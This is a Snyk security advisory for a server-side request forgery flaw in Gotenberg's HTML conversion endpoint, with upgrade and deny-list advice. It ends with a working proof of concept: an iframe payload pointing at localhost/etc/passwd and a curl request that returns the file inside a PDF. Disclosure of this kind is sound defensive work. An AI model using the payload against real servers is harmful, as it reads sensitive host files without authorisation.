Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsLearn about Server-side Request Forgery (SSRF) vulnerabilities in an interactive lesson.
Start learningUpgrade github.com/gotenberg/gotenberg/v8/pkg/modules/webhook
to version 8.1.0 or higher.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the /convert/html
endpoint when a request is made to a file via localhost, such as <iframe src="\\localhost/etc/passwd">
. By exploiting this vulnerability, an attacker can achieve local file inclusion, allowing of sensitive files read on the host system.
An alternative is using either or both --chromium-deny-list
and --chromium-allow-list
flags.
docker run --rm -p 3000:3000 gotenberg/gotenberg:8.0.3 gotenberg
<body>
<iframe src="\\localhost/etc/passwd">
</body>
curl -v \
--request POST 'http://localhost:3000/forms/chromium/convert/html' \
--form 'files=@"index.html"' -o output.pdf
output.pdf
, it will include the contents of /etc/passwd
.